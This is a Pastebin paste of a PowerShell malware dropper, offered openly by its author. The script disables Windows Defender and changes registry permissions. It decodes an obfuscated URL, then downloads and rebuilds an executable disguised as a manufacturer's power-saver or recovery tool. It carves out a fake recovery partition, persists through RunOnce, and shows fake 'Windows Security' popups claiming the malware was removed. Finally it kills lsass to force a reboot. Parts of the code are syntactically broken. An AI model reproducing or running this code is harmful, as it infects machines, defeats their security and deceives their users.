Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ### My First Powershell script making it public because I no longer write in powershell by xplosive###
- if (Test-Path "$env:TEMP\ParamsTest\Defender.garbage") {
- $Defender = 1
- } else {
- $Defender = 0
- } elseif (Test-Path "$env:TEMP\ParamsTest\EnableOverride.garbage") {
- $EnableOverride = 1
- } else {
- $EnableOverride = 0
- } elseif (Test-Path "$env:TEMP\ParamsTest\EnablePayload.garbage") {
- $EnablePayload = 1
- $PayloadOptions = False
- } else {
- $EnablePayload = 0
- }
- elseif (Test-Path "$env:TEMP\ParamsTest\DriveCreation.garbage") {
- $DriveCreation = 1
- } else {
- $DriveCreation = 0
- if (Test-Path "$env:TEMP\TestPathHere.txt") {
- $SetNamesTest = 1
- }
- $Manu = Gwmi Win32_ComputerSystem | Select-Object -ExpandProperty Manufacturer
- $CurrentUser = $env:USERNAME
- $Current = $env:USERNAME
- $RandText = Get-Random
- $userInput::BlockInput($true)
- ## Disables Monitoring
- Set-MpPreference -DisableRealtimeMonitoring $true
- ## Sets exection policy
- $GetPolicy = Get-ExecutionPolicy
- if($GetPolicy -notmatch 'Unrestricted') {
- Set-ExecutionPolicy Unrestricted
- }
- ## Permission set for auto run
- $acl = Get-Acl "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- $rule = New-Object System.Security.AccessControl.RegistryAccessRule ("$CurrentUser","FullControl","Allow")
- $acl.SetAccessRule($rule)
- $acl | Set-Acl -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- ## Disables Windows Defender
- IF(!(Test-Path $RegPath))
- {
- New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Force
- New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value "1"
- -PropertyType DWORD -Force }
- ELSE {
- New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value "1"
- -PropertyType DWORD -Force
- }
- ##Converts Payload link to text visits the link
- ##Then downloads the text converts to a zip
- ## Opens zip converts three parts of text inside
- ## to an exe and saves it for later
- $LeftData1 = "5423466743743535a4e66585656555"
- $LeftData2 = "1585a596c6d62657d4232647939636"
- $LeftData3 = "76744603243336638397c477642336"
- $Strung = Get-Variable LeftData* | select-Object -ExpandProperty value
- $ArrayBack1 = [String]::Join('',$Strung)
- $ArrayBack2 = $ArrayBack1 -split ""
- [array]::Reverse($ArrayBack2)
- $ArrayBack3 = $ArrayBack2 -join ''
- $PassArray = ""
- $ArrayBack3 -split '(.{2})' |%{ if ($_ -ne "") { $PassArray+=[CHAR]([CONVERT]::toint16("$_",16)) }}
- $ArrayText1 = $PassArray[0..14] + "=" -join ""
- $ArrayText2 = $PassArray[15..29] + "=" -join ""
- $ArrayText3 = $PassArray[30..45] + "=" -join ""
- $ConvertPart3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$ArrayText1"))
- $ConvertPart2 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$ArrayText2"))
- $ConvertPart1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$ArrayText3"))
- $ArrayReturn = Get-Variable ConvertPart* | select-Object -ExpandProperty value
- $ArrayBackA1 = [String]::Join('',$ArrayReturn)
- $ArrayBackA2 = $ArrayBackA1 -split ""
- [array]::Reverse($ArrayBackA2)
- $Zshark = $ArrayBackA2 -join ''
- ### Converts payload to zip
- $BaseProgram = Invoke-WebRequest -Uri $Zshark -UseBasicParsing
- $ConvertedPayload = [Convert]::FromBase64String($BaseProgram)
- $Random = Get-Random
- $ZipName = "TEMPAPP " + $Random
- $UnzipName = "TEMPDATA " + $Random
- New-Item "$Env:TEMP\$ZipName.zip" -Type File -Force
- [io.file]::WriteAllBytes("$Env:TEMP\$ZipName.zip" , $ConvertedPayload)
- Expand-Archive $env:TEMP\$ZipName.zip -DestinationPath $env:TEMP\$UnzipName\
- Remove-Item $env:TEMP\*TEMPAPP* -Force -Recurse -ErrorAction SilentlyContinue
- ## Converts Text
- $Content1 = Get-Content $env:TEMP\$UnzipName\A.doc -Raw
- $Content2 = Get-Content $env:TEMP\$UnzipName\B.doc -Raw
- $Content3 = Get-Content $env:TEMP\$UnzipName\C.doc -Raw
- ##Reverses Payload Text
- $arr1 = $Content1 -split ""
- [array]::Reverse($arr1)
- $REV1 = $arr1 -join ''
- $arr2 = $Content2 -split ""
- [array]::Reverse($arr2)
- $REV2 = $arr2 -join ''
- $arr3 = $Content3 -split ""
- [array]::Reverse($arr3)
- $REV3 = $arr3 -join ''
- #Joins Payload and convets to exe
- $ContentComb = Get-Variable REV* -ValueOnly
- $Join = ''
- $ContentComb1 = [String]::Join($Join,$ContentComb)
- $ConvertedText = [Convert]::FromBase64String($ContentComb1)
- #Folder Naming Scheme
- $ProgramName = $Manu + " Power Saver"
- $ProgramName1 = $Manu + " Recovery Tool"
- $VerNum = Get-Random -InputObject "Alpha ", "Beta ", "Public " , "Final "
- $VerNumMatch1 = Get-Random -Maximum 10
- $VerNumMatch2 = Get-Random -Maximum 6
- $FileSize1 = Get-Random -Maximum 50000
- $FileSize2 = Get-Random -Maximum 50000
- $FileSize3 = Get-Random -Maximum 10000
- $FileSize4 = Get-Random -Maximum 9000
- $VersionFolder = $VerNum + $VerNumMatch1 + "." + $VerNumMatch2
- $DriveName = $Manu + " Recovery Partition"
- #Makes it look like a manufacter product
- # Mean't for the computer
- New-Item "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.exe" -Type File -Force
- [io.file]::WriteAllBytes("C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.exe" , $ConvertedText)
- ##Creates Fake files
- remove-item "$env:TEMP\*TEMPDATA*" -Force -Recurse -ErrorAction SilentlyContinue
- New-Item "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolde\CrashReports" -Type Directory -Force
- fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\NetXServiceFile.dll" $FileSize1
- fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\PowerMeterF.dll" $FileSize2
- fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.conf" $FileSize3
- fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$Manu Diagnose.xml " $FileSize4
- ##Creates Fake Recovery Drive
- $DriveRandomLetter = Get-Content -Path "$env:APPDATA\FolderLetter\FolderLetter.txt"
- #Tests to see if a recovery drive has already been made
- if ($DriveRandomLetter -ne $null) {
- Resize-Partition -DriveLetter C -Size ((Get-Partition -DriveLetter C).Size - 20MB)
- $DiskNum = get-partition -DriveLetter C | get-disk | Select-Object -ExpandProperty number
- New-Partition -DiskNumber $DiskNum -UseMaximumSize -DriveLetter $DriveRandomLetter | Format-Volume -Force
- Set-Volume -DriveLetter $DriveRandomLetter -NewFileSystemLabel "$DriveName"
- $FileHere1 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- New-Item $FileHere1 -Type File -Force
- $FileHere2 = "$DriveRandomLetter" + ":\DataTest\Test.Data"
- New-Item $FileHere2 -Type File -Force
- $FileHere3 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- [io.file]::WriteAllBytes($FileHere3 , $ConvertedText)
- $FileHere4 = "$DriveRandomLetter" + ":\RecoveryXd4.dll"
- fsutil file createnew $FileHere4 $FileSize1
- $FileHere5 = "$DriveRandomLetter" + ":\RecoverList.Xmll"
- fsutil file createnew $FileHere5 $FileSize2
- $FileHere6 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.conf"
- fsutil file createnew $FileHere6 $FileSize3
- $FileHere7 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$Manu Recover.xml"
- fsutil file createnew $FileHere7 $FileSize4
- $FileHere8 = "$DriveRandomLetter" + ":\DataTest"
- $file8 = Get-Item $FileHere8
- $file8.Attributes = 'System'
- }elseif($DriveRandomLetter -eq $null) {
- $WH200 = New-Object -ComObject Wscript.Shell
- $WH200.Popup("We Are Going To Create A Recovery Drive Please Click Okay To Continue",0,"Windows Security",0x0)
- New-item "$env:APPDATA\FolderLetter\FolderLetter.txt" -type file -force
- $DriveRandom = ls function:[d-z]: -n | ?{ !(test-path $_) } | random
- $DriveLetterHere = $DriveRandom
- Add-Content "$env:APPDATA\FolderLetter\FolderLetter.txt" $DriveLetterHere
- Resize-Partition -DriveLetter C -Size ((Get-Partition -DriveLetter C).Size - 20MB)
- $DiskNum = get-partition -DriveLetter C | get-disk | Select-Object -ExpandProperty number
- New-Partition -DiskNumber $DiskNum -UseMaximumSize -DriveLetter $DriveLetterHere | Format-Volume -Force
- Set-Volume -DriveLetter $DriveLetterHere -NewFileSystemLabel "$DriveName"
- $FileHere9 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- New-Item $FileHere9 -Type File -Force
- $FileHere10 = "$DriveLetterHere" + "\DataTest\Test.Data"
- New-Item $FileHere10 -Type File -Force
- $FileHere11 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- [io.file]::WriteAllByte($FileHere11 , $ConvertedText)
- $FileHere12 = "$DriveLetterHere" + "\RecoveryXd4.dll"
- fsutil file createnew $FileHere12 $FileSize1
- $FileHere13 = "$DriveLetterHere" + "\RecoverList.Xml"
- fsutil file createnew $FileHere13 $FileSize2
- $FileHere14 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.conf"
- fsutil file createnew $FileHere14 $FileSize3
- $FileHere15 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$Manu Recover.xml"
- fsutil file createnew $FileHere15 $FileSize4
- $FileHere16 = "$DriveLetterHere" + "\DataTest"
- $file16 = Get-Item $FileHere16
- $file16.Attributes = 'System'
- }
- $userInput::BlockInput($true)
- ## Other Payload run next boot If first payload failed
- $RegPath1 = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
- $RegName1 = "Run"
- $RegValue1 = "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.exe"
- IF(!(Test-Path $RegPath1))
- {
- New-Item -Path $RegPath1 -Force
- New-ItemProperty -Path $RegPath1 -Name $RegName1 -Value $RegValue1
- -PropertyType DWORD -Force }
- ELSE {
- New-ItemProperty -Path $RegPath1 -Name $RegName1 -Value $RegValue1
- -PropertyType DWORD -Force
- }
- ##Fixes file names
- If ($SetNamesTest -eq 1){
- Get-ChildItem -Path *.exe -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- Get-ChildItem -Path *.txt -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- Get-ChildItem -Path *.png -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- Get-ChildItem -Path *.zip -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- Get-ChildItem -Path *.rar -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- #Resets set names variable
- Remove-Item -Path "$env:TEMP\TestPathHere.txt" -Force
- }
- Start-Sleep -Seconds 10
- ##Hides installed file
- $file = Get-Item "$env:USERPROFILE\Microsoft Apps"
- $file.Attributes = 'Hidden'
- $file4 = Get-Item "Z:\$Current\"
- $file4.Attributes = 'Hidden'
- #Waits for payload to install then disables user acess to autorun
- $acl1 = Get-Acl "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
- $rule1 = New-Object System.Security.AccessControl.RegistryAccessRule ("$CurrentUser","ReadAcess","Allow")
- $acl1.SetAccessRule($rule1)
- $acl1 | Set-Acl -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
- & "Z:\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- $WH1 = New-Object -ComObject Wscript.Shell
- $userInput::BlockInput($false)
- ##Fake Completion Message
- $WH1.Popup("Success Windows Defender Was Enabled And Powershell Removed The Malware, There Will Be A Log File On Your Desktop, Your Computer May Reboot Now",0,"Windows Security",0x0)
- ## Creates log file
- $InfoHereNow = Get-CimInstance Win32_OperatingSystem | Select Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName
- New-Item "C:\Users\$CurrentUser\Desktop\Removal Log.txt" -type file -force
- Add-content "C:\Users\$CurrentUser\Desktop\Removal Log.txt" $InfoHereNow
- Add-content "C:\Users\$CurrentUser\Desktop\Removal Log.txt" $FakeLog
- ##Reboots Computer
- $GetProcessID = Get-Process lsass | select-Object -ExpandProperty Id
- Stop-Process -Id $GetProcessID -force
- ##Exits
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement